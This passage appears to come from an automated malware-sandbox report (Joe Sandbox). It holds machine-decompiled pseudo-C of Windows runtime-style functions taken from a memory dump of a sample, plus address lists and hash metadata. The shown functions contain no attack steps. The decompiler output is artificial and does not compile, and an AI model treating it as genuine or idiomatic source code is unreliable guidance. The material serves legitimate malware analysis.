				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x11ed360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01124E70(0x11e86e4, 0x1139490, 0, 0);
					if( *0x11e53e8 > 5 && E01138F33(0x11e53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x11e53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x11e53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x10dbc46;
						_t48 = E01177B9C(0x11e53e8, 0x10dbc46, _t67, 0x11e53e8, _t70,  &_v140);
					}
				}
				return E0113B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                          0x01138ec7
                                          0x01138ed9
                                          0x01138edc
                                          0x01138ee6
                                          0x01138ee9
                                          0x01138eee
                                          0x01138efc
                                          0x01138f08
                                          0x01171349
                                          0x01171353
                                          0x0117135d
                                          0x01171366
                                          0x0117136f
                                          0x01171375
                                          0x0117137c
                                          0x01171385
                                          0x01171390
                                          0x01171391
                                          0x0117139c
                                          0x0117139d
                                          0x011713a6
                                          0x011713ac
                                          0x011713b2
                                          0x011713b5
                                          0x011713bc
                                          0x011713bf
                                          0x011713c2
                                          0x011713c5
                                          0x011713c8
                                          0x011713cb
                                          0x011713ce
                                          0x011713d1
                                          0x011713d4
                                          0x011713d7
                                          0x011713da
                                          0x011713dd
                                          0x011713e0
                                          0x011713e3
                                          0x011713e6
                                          0x011713e9
                                          0x011713f6
                                          0x01171400
                                          0x01171400
                                          0x01138f08
                                          0x01138f32

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7fb48ff3a957dfc1ca8e2b82c1f22ae3e4f25d3a3b6961ddbaa1c5f8758eaf6
                                          • Instruction ID: d3332ec951f4b4cc837c4a0cf907e08e307cc7aad3457c7c5db5a2c86ed20613
                                          • Opcode Fuzzy Hash: a7fb48ff3a957dfc1ca8e2b82c1f22ae3e4f25d3a3b6961ddbaa1c5f8758eaf6
                                          • Instruction Fuzzy Hash: D941B1B5D0031C9EDB24CFAAD980AADFBF8FB48314F5041AEE509A7640EB705A84CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112E730 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0112E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01139670() < 0) {
					L0114DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x11e7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01114620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0112E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                          0x0112e730
                                          0x0112e736
                                          0x0112e738
                                          0x0112e73d
                                          0x0112e73e
                                          0x0112e740
                                          0x0112e749
                                          0x0112e765
                                          0x0112e76a
                                          0x0112e76b
                                          0x0112e76c
                                          0x0112e76d
                                          0x0112e76e
                                          0x0112e76f
                                          0x0112e775
                                          0x0112e777
                                          0x0112e77e
                                          0x0116b675
                                          0x0112e784
                                          0x0112e784
                                          0x0112e789
                                          0x0112e7a8
                                          0x0112e7ac
                                          0x0112e807
                                          0x0112e7ae
                                          0x0112e7ae
                                          0x0112e7b1
                                          0x0112e7b4
                                          0x0112e7b9
                                          0x0112e7c0
                                          0x0112e7c4
                                          0x0112e7ca
                                          0x0112e7cc
                                          0x00000000
                                          0x0112e7d3
                                          0x0112e7d6
                                          0x00000000
                                          0x00000000
                                          0x0112e7ff
                                          0x0112e802
                                          0x00000000
                                          0x00000000
                                          0x0112e7f9
                                          0x0112e7fc
                                          0x00000000
                                          0x00000000
                                          0x0112e7f3
                                          0x0112e7f6
                                          0x00000000
                                          0x00000000
                                          0x0112e7ed
                                          0x0112e7f0
                                          0x00000000
                                          0x00000000
                                          0x0112e7e7
                                          0x0112e7ea
                                          0x00000000
                                          0x00000000
                                          0x0116b685
                                          0x0116b688
                                          0x00000000
                                          0x00000000
                                          0x0116b682
                                          0x00000000
                                          0x00000000
                                          0x0112e7cc
                                          0x0112e7d9
                                          0x0112e7dc
                                          0x0112e7de
                                          0x0112e7de
                                          0x0112e7ac
                                          0x0112e7e4
                                          0x0112e74b
                                          0x0112e751
                                          0x0112e759
                                          0x0112e761
                                          0x0112e761

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: de328f54fbd0e86e9321492697d573e67dba5bae6f720411b265cf73d0e95a2a
                                          • Instruction ID: b3275f53d7ac2c14c0cd8f37d6e44fbdf61b1fc4027fdf6043b08963bb94d37c
                                          • Opcode Fuzzy Hash: de328f54fbd0e86e9321492697d573e67dba5bae6f720411b265cf73d0e95a2a
                                          • Instruction Fuzzy Hash: BF315C75A14249AFD748CF58D841B9ABBE8FB09314F148266FA14CB341E771ED90CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112BC2C Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0112BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x11e6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01112280(0xd, 0x597f1a0);
				_t41 =  *0x11e60f8; // 0x0
				if(_t41 != 0) {
					 *0x11e60f8 =  *_t41;
					 *0x11e60fc =  *0x11e60fc + 0xffff;
				}
				E0110FFB0(_t41, 0x800, 0x597f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x11e60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01114620(0x11e6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x11e6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                          0x0112bc36
                                          0x0112bc42
                                          0x0112bc45
                                          0x0112bc4a
                                          0x0112bd35
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0112bc50
                                          0x0112bc50
                                          0x0112bc58
                                          0x0112bc5a
                                          0x0112bc60
                                          0x00000000
                                          0x00000000
                                          0x0116a4f2
                                          0x0116a4f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0116a4fc
                                          0x0112bc79
                                          0x0112bc7e
                                          0x0112bc86
                                          0x0112bd16
                                          0x0112bd20
                                          0x0112bd20
                                          0x0112bc8d
                                          0x0112bc94
                                          0x0112bcbd
                                          0x0112bcca
                                          0x0112bccb
                                          0x0112bccc
                                          0x0112bccd
                                          0x0112bcce
                                          0x0112bcd4
                                          0x0112bcea
                                          0x0112bcee
                                          0x0112bcf2
                                          0x0112bd00
                                          0x0112bd04
                                          0x00000000
                                          0x0112bc96
                                          0x0112bcab
                                          0x0112bcaf
                                          0x0112bd2c
                                          0x0112bd2c
                                          0x0112bd09
                                          0x00000000
                                          0x0112bd09
                                          0x0112bcb1
                                          0x0112bcb5
                                          0x0112bcbb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0112bcbb

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d66d430003e794162e2e0344a0373fb7ead3cff95d6b5a9b41ae09fced0d8ee8
                                          • Instruction ID: ab0a67951ec1913e5f654fd26fb9bbd093719dca30809b39df4a502bac561adb
                                          • Opcode Fuzzy Hash: d66d430003e794162e2e0344a0373fb7ead3cff95d6b5a9b41ae09fced0d8ee8
                                          • Instruction Fuzzy Hash: D531453260462A8BCB1ADF98C4807AA77B4FF28324F450078ED14DF206EB74D995CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F9100 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E010F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x11cf6e8);
				E0114D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E011C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0114D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x11e86c0; // 0xca07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x11e86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01112280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E011C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0113AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x11eb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x11e84c0;
										if(_t69 >=  *0x11e84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E011C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E010F922A(_t82);
							_t53 = E01117D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E011C8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x11e86c0; // 0xca07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x11e86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x11e86bc;
										_t72 = 0x11e86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E010F9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x11e86c4;
									_t72 = 0x11e86c0;
									L18:
									E01129B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                          0x010f9100
                                          0x010f9100
                                          0x010f9100
                                          0x010f9100
                                          0x010f9102
                                          0x010f9107
                                          0x010f910c
                                          0x010f9110
                                          0x010f9115
                                          0x010f9136
                                          0x010f9143
                                          0x011537e4
                                          0x011537e4
                                          0x010f9149
                                          0x010f914e
                                          0x010f914e
                                          0x010f9117
                                          0x010f911d
                                          0x00000000
                                          0x00000000
                                          0x010f911f
                                          0x010f9125
                                          0x00000000
                                          0x010f9151
                                          0x010f9158
                                          0x010f915d
                                          0x010f9161
                                          0x010f9168
                                          0x01153715
                                          0x00000000
                                          0x010f916e
                                          0x010f916e
                                          0x010f9175
                                          0x010f9177
                                          0x010f917e
                                          0x010f917f
                                          0x010f9182
                                          0x010f9182
                                          0x010f9187
                                          0x010f9187
                                          0x010f918a
                                          0x010f918d
                                          0x010f918f
                                          0x010f9192
                                          0x010f9195
                                          0x010f9198
                                          0x010f9198
                                          0x010f9198
                                          0x010f919a
                                          0x00000000
                                          0x00000000
                                          0x0115371f
                                          0x01153721
                                          0x01153727
                                          0x0115372f
                                          0x01153733
                                          0x01153735
                                          0x01153738
                                          0x0115373b
                                          0x0115373d
                                          0x01153740
                                          0x00000000
                                          0x00000000
                                          0x01153746
                                          0x01153749
                                          0x00000000
                                          0x00000000
                                          0x0115374f
                                          0x01153751
                                          0x00000000
                                          0x00000000
                                          0x01153757
                                          0x01153759
                                          0x0115375c
                                          0x0115375c
                                          0x0115375e
                                          0x0115375e
                                          0x01153761
                                          0x01153764
                                          0x00000000
                                          0x00000000
                                          0x01153766
                                          0x01153768
                                          0x011537a3
                                          0x011537a3
                                          0x011537a5
                                          0x011537a7
                                          0x011537ad
                                          0x011537b0
                                          0x011537b2
                                          0x011537bc
                                          0x011537c2
                                          0x011537c2
                                          0x011537b2
                                          0x010f9187
                                          0x010f9187
                                          0x010f918a
                                          0x010f918d
                                          0x010f918f
                                          0x010f9192
                                          0x010f9195
                                          0x00000000
                                          0x010f9195
                                          0x00000000
                                          0x010f9187
                                          0x0115376a
                                          0x0115376a
                                          0x0115376c
                                          0x0115376c
                                          0x0115376f
                                          0x01153775
                                          0x00000000
                                          0x00000000
                                          0x01153777
                                          0x01153779
                                          0x00000000
                                          0x00000000
                                          0x01153782
                                          0x01153787
                                          0x01153789
                                          0x01153790
                                          0x01153790
                                          0x0115378b
                                          0x0115378b
                                          0x0115378b
                                          0x01153792
                                          0x01153795
                                          0x01153795
                                          0x01153798
                                          0x01153798
                                          0x0115379b
                                          0x0115379b
                                          0x010f91a3
                                          0x010f91a9
                                          0x010f91b0
                                          0x010f91b4
                                          0x010f91b4
                                          0x010f91bb
                                          0x010f91c0
                                          0x010f91c5
                                          0x010f91c7
                                          0x011537da
                                          0x010f91cd
                                          0x010f91cd
                                          0x010f91cd
                                          0x010f91d2
                                          0x010f91d5
                                          0x010f9239
                                          0x010f9239
                                          0x010f91d7
                                          0x010f91db
                                          0x010f91e1
                                          0x010f91e7
                                          0x010f91fd
                                          0x010f9203
                                          0x010f921e
                                          0x010f9223
                                          0x00000000
                                          0x010f9223
                                          0x010f9205
                                          0x010f9208
                                          0x010f920c
                                          0x010f9214
                                          0x010f9214
                                          0x010f91e9
                                          0x010f91e9
                                          0x010f91ee
                                          0x010f91f3
                                          0x010f91f3
                                          0x010f91f3
                                          0x010f91e7
                                          0x00000000
                                          0x010f91db
                                          0x010f9187
                                          0x010f9168

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4707ea64db42ee3612755a42f7c11c4e137d201e77b7d2d1b84148a925521a00
                                          • Instruction ID: 3c32029db6df5780a74c5fd0e6db1e77a9b89030571e1ebf808119433f4f5e5a
                                          • Opcode Fuzzy Hash: 4707ea64db42ee3612755a42f7c11c4e137d201e77b7d2d1b84148a925521a00
                                          • Instruction Fuzzy Hash: C0313575E00645DFEB6ADFACC089BACBBF1BB5831CF1881ADE65467641C330A880CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01121DB5 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E01121DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0111F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01114620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0111F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                          0x01121dc2
                                          0x01121dc5
                                          0x01121dc7
                                          0x01121dcc
                                          0x01121dce
                                          0x01121dd6
                                          0x01121ddf
                                          0x01121de0
                                          0x01121de1
                                          0x01121de5
                                          0x01121de8
                                          0x01121def
                                          0x01121df0
                                          0x01121df6
                                          0x01121df7
                                          0x01121dfe
                                          0x01121e1a
                                          0x00000000
                                          0x00000000
                                          0x01121e0b
                                          0x01121e12
                                          0x01121e12
                                          0x01121e00
                                          0x01121e00
                                          0x01121e05
                                          0x01121e1e
                                          0x01121e23
                                          0x0116570f
                                          0x01165713
                                          0x00000000
                                          0x00000000
                                          0x01165719
                                          0x01165719
                                          0x01121e2c
                                          0x01121e2d
                                          0x01121e2e
                                          0x01121e2f
                                          0x01121e31
                                          0x01121e32
                                          0x01121e35
                                          0x01121e3d
                                          0x01165723
                                          0x0116573d
                                          0x0116573d
                                          0x00000000
                                          0x01165723
                                          0x01121e49
                                          0x01121e4e
                                          0x01121e4e
                                          0x01121e09
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: 4863a0a91abae08a73b73b6f7ea2d2773ce2cd8a975b02bc7d79d4b7da8bd544
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: 9D21A472600129FFD72ACF59CC80EABFBBDEF85694F114065EA05A7210D734AE21C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01110050 Relevance: .1, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E01110050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x11ed360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01129ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0113B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E011C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01129702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x11eb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                          0x01110055
                                          0x0111005d
                                          0x01110062
                                          0x0111006c
                                          0x0111006f
                                          0x01110074
                                          0x0111007a
                                          0x0111007a
                                          0x01110080
                                          0x01110080
                                          0x01110087
                                          0x0111008d
                                          0x0111008f
                                          0x01110093
                                          0x01110095
                                          0x0111009b
                                          0x011100f8
                                          0x011100fb
                                          0x011100fc
                                          0x011100ff
                                          0x01110108
                                          0x01110108
                                          0x011100a2
                                          0x011100a6
                                          0x011100b3
                                          0x011100bc
                                          0x011100c5
                                          0x011100ca
                                          0x0115c01e
                                          0x00000000
                                          0x00000000
                                          0x0115c02d
                                          0x011100d5
                                          0x011100d9
                                          0x0115c03d
                                          0x0115c046
                                          0x0115c046
                                          0x011100df
                                          0x011100e2
                                          0x011100ea
                                          0x011100ef
                                          0x011100f2
                                          0x011100f6
                                          0x01110111
                                          0x01110117
                                          0x01110117
                                          0x00000000
                                          0x011100f6
                                          0x011100d0
                                          0x011100d0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95875505bc6ee1efd66840ff2c4e4707aeccdd33a8916df0689fd871198882e8
                                          • Instruction ID: 34bd18dc99e3f9729d320fcaff3807aab562ff2669407412352bfeee79af582b
                                          • Opcode Fuzzy Hash: 95875505bc6ee1efd66840ff2c4e4707aeccdd33a8916df0689fd871198882e8
